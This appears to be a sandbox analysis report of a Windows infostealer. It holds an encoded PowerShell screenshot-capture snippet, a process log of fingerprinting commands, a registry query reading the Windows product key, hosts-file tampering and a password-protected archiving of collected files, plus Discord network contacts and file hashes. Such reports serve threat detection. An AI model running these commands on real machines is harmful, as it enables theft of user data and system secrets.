IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp" "c:\Users\Admin\AppData\Local\Temp\x5xeol1u\CSC93BD618D8B734D548C40C38081E279FF.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\geNAr.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\geNAr.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-4bg2h.in | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI49922\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/212-25-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI49922\base_library.zip
| MD5 | 4b011f052728ae5007f9ec4e97a4f625 |
| SHA1 | 9d940561f08104618ec9e901a9cd0cd13e8b355d |
| SHA256 | c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6 |
| SHA512 | be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_ctypes.pyd
| MD5 | 343e1a85da03e0f80137719d48babc0f |
| SHA1 | 0702ba134b21881737585f40a5ddc9be788bab52 |
| SHA256 | 7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664 |
| SHA512 | 1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_ssl.pyd
| MD5 | e5f6bff7a8c2cd5cb89f40376dad6797 |
| SHA1 | b854fd43b46a4e3390d5f9610004010e273d7f5f |
| SHA256 | 0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5 |
| SHA512 | 5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9 |
memory/212-48-0x00007FFA00EE0000-0x00007FFA00EEF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_sqlite3.pyd
| MD5 | a9d2c3cf00431d2b8c8432e8fb1feefd |
| SHA1 | 1c3e2fe22e10e1e9c320c1e6f567850fd22c710c |
| SHA256 | aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3 |
| SHA512 | 1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_socket.pyd
| MD5 | 2957b2d82521ed0198851d12ed567746 |
| SHA1 | ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2 |
| SHA256 | 1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2 |
| SHA512 | b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_queue.pyd
| MD5 | 0e5997263833ce8ce8a6a0ec35982a37 |
| SHA1 | 96372353f71aaa56b32030bb5f5dd5c29b854d50 |
| SHA256 | 0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e |
| SHA512 | a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_lzma.pyd
| MD5 | 932147ac29c593eb9e5244b67cf389bb |
| SHA1 | 3584ff40ab9aac1e557a6a6009d10f6835052cde |
| SHA256 | bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3 |
| SHA512 | 6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_hashlib.pyd
| MD5 | d71df4f6e94bea5e57c267395ad2a172 |
| SHA1 | 5c82bca6f2ce00c80e6fe885a651b404052ac7d0 |
| SHA256 | 8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2 |
| SHA512 | e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_decimal.pyd
| MD5 | 8b623d42698bf8a7602243b4be1f775d |
| SHA1 | f9116f4786b5687a03c75d960150726843e1bc25 |
| SHA256 | 7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c |
| SHA512 | aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_bz2.pyd
| MD5 | 3bd0dd2ed98fca486ec23c42a12978a8 |
| SHA1 | 63df559f4f1a96eb84028dc06eaeb0ef43551acd |
| SHA256 | 6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07 |
| SHA512 | 9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\unicodedata.pyd
| MD5 | bc28491251d94984c8555ed959544c11 |
| SHA1 | 964336b8c045bf8bb1f4d12de122cfc764df6a46 |
| SHA256 | f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4 |
| SHA512 | 042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\sqlite3.dll
| MD5 | 74b347668b4853771feb47c24e7ec99b |
| SHA1 | 21bd9ca6032f0739914429c1db3777808e4806b0 |
| SHA256 | 5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e |
| SHA512 | 463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\select.pyd
| MD5 | e021cf8d94cc009ff79981f3472765e7 |
| SHA1 | c43d040b0e84668f3ae86acc5bd0df61be2b5374 |
| SHA256 | ab40bf48a6db6a00387aece49a03937197bc66b4450559feec72b6f74fc4d01e |
| SHA512 | c5ca57f8e4c0983d9641412e41d18abd16fe5868d016a5c6e780543860a9d3b37cc29065799951cb13dc49637c45e02efb6b6ffeaf006e78d6ce2134eb902c67 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\blank.aes
| MD5 | a18a2670024e849f0c6219103fb6dd3f |
| SHA1 | a8d9f28c53612a702fee403ddb0608e15c522a82 |
| SHA256 | 65e6583d8708ec9633a53e7aaf93ce91d38ba4296c7b7480f49c237ab50e93e8 |
| SHA512 | 6a1f0f76287c2a275fc10bf97941e03da7908215a408d41e3f680534e8ff5973421f8ce662812eddb19aecf122230f5c83562b7c02897dd009a12da41437d16e |
memory/212-30-0x00007FFA00170000-0x00007FFA00194000-memory.dmp
memory/212-56-0x00007FF9FB0D0000-0x00007FF9FB0E9000-memory.dmp
memory/212-55-0x00007FF9FB0F0000-0x00007FF9FB11D000-memory.dmp
memory/212-58-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp
memory/212-60-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp
memory/212-62-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp
memory/212-64-0x00007FF9FDA50000-0x00007FF9FDA5D000-memory.dmp
memory/212-66-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp
memory/212-68-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp
memory/212-71-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp
memory/212-74-0x00007FFA00170000-0x00007FFA00194000-memory.dmp
memory/212-73-0x000001883C400000-0x000001883C929000-memory.dmp
memory/212-72-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp
memory/212-78-0x00007FF9FD960000-0x00007FF9FD96D000-memory.dmp
memory/212-77-0x00007FF9FA620000-0x00007FF9FA634000-memory.dmp
memory/212-80-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp
memory/212-81-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp
memory/3680-82-0x00007FF9E9F43000-0x00007FF9E9F45000-memory.dmp
memory/3680-89-0x0000019DB4530000-0x0000019DB4552000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moa0a5b4.yuz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3680-93-0x00007FF9E9F40000-0x00007FF9EAA01000-memory.dmp
memory/3680-103-0x00007FF9E9F40000-0x00007FF9EAA01000-memory.dmp
memory/5052-106-0x000001E83E600000-0x000001E83E81C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/3680-111-0x00007FF9E9F40000-0x00007FF9EAA01000-memory.dmp
memory/3680-110-0x0000019DB3920000-0x0000019DB3B3C000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.cmdline
| MD5 | 5aca8f778004cd7fa853d33dc2295ce2 |
| SHA1 | 0b409dbb92365052cf8143cfa1d8787b80738d1d |
| SHA256 | ff49246896042fa495c1365a12ba0fe7d49d4e969d7bad6e9641f0b401107434 |
| SHA512 | d483801eea5fae838782ceded1f75916a09c360a19fcc8edbd950c7a94851f66c9ea544bbdfaac3c678dea051106955049c5219e7090e6bf0d4fcacdcdd79054 |
\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\CSC93BD618D8B734D548C40C38081E279FF.TMP
| MD5 | a6ed6e280395471274138461e3aa9ace |
| SHA1 | e7e52f19db47f5ac819123a68a34a7f5dd9af782 |
| SHA256 | d455c3379af9addaef1edc7fb297bf2f9144aa653de553b2a7e521614f8ecdee |
| SHA512 | 68d3998a55cd2866ebfeb334a4839687934be6c35e06098148a9cccfa64433c0b46515a0c01255f0d710fc3d09caa2b3569253935dfa7a2dadf82a13675ae320 |
C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp
| MD5 | 8a650c6ed51a264fe09b85da8b3ac265 |
| SHA1 | a9e83a49d5cc0c2c0cf52ddcece2c289c5f7bbb7 |
| SHA256 | 1cb5178fd915d9a8a887b3bfed03a27e76ed744823546c803620c86641ac67d3 |
| SHA512 | 04068999550faaf04a7b3e5095e86edf56d086ea94f81f0d9820c0f11869f72568ad373666d5071728c1f92aeab51e588103dbf889cb9a6b4dbcffa07e4a442b |
memory/2124-146-0x0000022375D60000-0x0000022375D68000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.dll
| MD5 | 8a97c86db275dfee8d1ab5f458efd4f5 |
| SHA1 | 7a6824349ee7c7e63216783d07688ff641cbdcc4 |
| SHA256 | 46831cfd2bcfc2450443a6a39e455bb0ba19259c558398c5490ad7b057023a83 |
| SHA512 | 0a38f3ba09d99ee5a3f4a5271f2f1f9015ccfc3cb69cf62c67535590d9bb7e7a2bc6bb39086ddc766ff3d35cc58f1921018668374a9a5e9c89c233263e28c62b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a7753640b549244dafbbbc068e9bc5b |
| SHA1 | 973287b37dd2c8ef662db9829ec82205793e8e78 |
| SHA256 | a700ed9ed24158a89ecb35d49e0ea31f83ba123073ed07f35f990242e1a00799 |
| SHA512 | 0fed225e1fb142050cd8db3a1c104d0fa72c74d673bdc3b3e9259526159c24478d255098c7bd798d936077727ea8c46e4456c393beba66b831724945a573e54b |
memory/212-158-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp
memory/212-160-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Directories\Desktop.txt
| MD5 | a7a69c07210cd16f58317024cd9522c4 |
| SHA1 | 6759bb504507f003ba4c18a291970e6dce1dd3cb |
| SHA256 | 771a0452f3c08c440a87a46e8325ae3861454d063e71ffb9a07bb65f57e8eb59 |
| SHA512 | 92a4059978eec74dbc398ea5d935af916d546afc5ad6df1881343e4084ccee51433faf8baf7e99c7a00d18313e60241c86de9495a1e44cfd1cb155a10f30278b |
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png
| MD5 | 87393664cdcc018e0651613ac8c2dac9 |
| SHA1 | 099ee6c7a5b65355a1712719e1770fc5ec767d7b |
| SHA256 | ed8f053254f03e1f9d2b262fec9bf36edaab935a179d50f7dec60bede7c6911f |
| SHA512 | 53988b060f96b952352bffe64d517d8d0f82119c7e5593221a697ce31a104e4dbf43f132db6d5ff3a10bf8cd63c2a5dd4797e3f8a6ef2821a7fb01d898b26e25 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Videos.txt
| MD5 | e140e10b2b43ba6f978bee0aa90afaf7 |
| SHA1 | bbbeb7097ffa9c2daa3206b3f212d3614749c620 |
| SHA256 | c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618 |
| SHA512 | df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Pictures.txt
| MD5 | 6530968aa22c3f1719db74236282ddbf |
| SHA1 | f219a9d0756796d20608c84c2b80554bd8cb277e |
| SHA256 | 2b0946a11e59e4a8631463ab21f230f7d417b47cbce6a8dc517645e3efd9fef0 |
| SHA512 | dd02d6228356485ad5df83ad9bcdb0f0fbc0d4b19625c3176ad9391e0820a085dba843c1cfb837107329a741d1c75ebddb216f3669edcc59fc3462818d80adc3 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Music.txt
| MD5 | 1e14f6d525ced3279fe629aed063429a |
| SHA1 | 909892724eb0f7a73db8726546b00b62c519e7fe |
| SHA256 | c6b374392c031875ef56132b8dea8a6e3acc938f7c6a710905ee3b725b6766d3 |
| SHA512 | e79725957ac983bacfc3d8114a1bdf6644e42e142cad0a665860acdb07ab362bfe4c4b4e932cd89b5795fbae9cfa1570a8415c4d748941ea3bb4b051d69ff124 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Downloads.txt
| MD5 | a6c17592ce0f3235e89f42c8faba08d4 |
| SHA1 | 853e0924ae03b7784299103c4db08bba90bb60dd |
| SHA256 | 910ebfbbe2b984777b48a32ffbea473afffd631c7601f6c559dc2d6a6ec7863b |
| SHA512 | 5227131d2ff89d17caa37b5bd027a317e745235788abe3968cdcc0f4dc205e749b6e41e3dfcc10ae2b8db93eb936195baab4f4cbfc145fe0c6c3a2adf8fa1576 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Documents.txt
| MD5 | 3b88658e33c842943000a1c4df1bad1d |
| SHA1 | a3d9fdf3e32a0b82de380ac4cd5e274bdb513975 |
| SHA256 | 5b2127372485940b91f40798df5182c314b20eef9c89d2e7ef19259b690e03e6 |
| SHA512 | faf165d278d60feeccc2ed95677b02d7cda7ee3c7cb1ccb617f8e40ae0c2f1893ad2546325bcf8dd2f671b0dcfaf73954824a9e74027c2823bafc83a79494c7e |
C:\Users\Admin\AppData\Local\Temp\ \System\MAC Addresses.txt
| MD5 | ae3df1602c6b6124ba1ea2dd242d2622 |
| SHA1 | 398a828cae01fa3c9b5fe4ec51c81c903c4e4d1b |
| SHA256 | 6021f29f11eed78a5438edef612743520d7a72b5a16ab9c2094827363fe13f1b |
| SHA512 | d20930c2325b2874885151881d62979632d16154183720d668ec9e300b77e5f9143fe5fb4f6572261f5e522d73e9865de114c9884316a490b56171743b35a4ef |
C:\Users\Admin\AppData\Local\Temp\ \System\System Info.txt
| MD5 | bb78ec3e54916cfad87c8620d4a705e6 |
| SHA1 | 458e08823cd29f68f2d465a6d7eec2879f85d049 |
| SHA256 | fb611673c8c02bf66d323a5c66e76f75df231e01242d8133dbba186b824e2ccc |
| SHA512 | 60455f1fab0c35572d65e8c24533fc2a2ea58395032509d37ce656a96b2ba5f0f8533b517f98262a3eefb1e0aa2d9d1ace1f3c08ab2767f5af6da713587cbe72 |
